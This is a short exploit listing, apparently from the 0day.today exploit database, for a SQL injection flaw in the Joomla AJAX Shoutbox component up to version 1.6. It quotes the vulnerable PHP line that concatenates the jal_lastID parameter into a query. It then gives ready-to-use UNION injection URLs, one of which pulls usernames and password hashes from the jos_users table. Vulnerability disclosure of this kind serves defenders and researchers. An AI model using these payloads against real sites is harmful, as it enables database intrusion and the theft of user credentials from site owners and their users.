[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla AJAX Shoutbox <= 1.6 - Remote SQL Injection Vulnerability

Author
Pen Ten
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-22032
Category
web applications
Date add
17-03-2014
Platform
php
[+] Details:
[-] include "helper.php";
[-] parameter: jal_lastID
[-] Code: 
113 $jal_lastID = JRequest::getVar( 'jal_lastID',       0        );
114
115 $query = 'SELECT * FROM #__shoutbox WHERE id > '.$jal_lastID.' ORDER BY id DESC';
 
[-] Exploit: 
?mode=getshouts&jal_lastID=1337133713371337+union+select+column,2,3,4,5,6+from+table-- -
 
Example:
?mode=getshouts&jal_lastID=1337133713371337+union+select+group_concat(username,0x3a,password),1,1,1,1,1+from+jos_users-- -

#  0day.today [2024-07-05]  #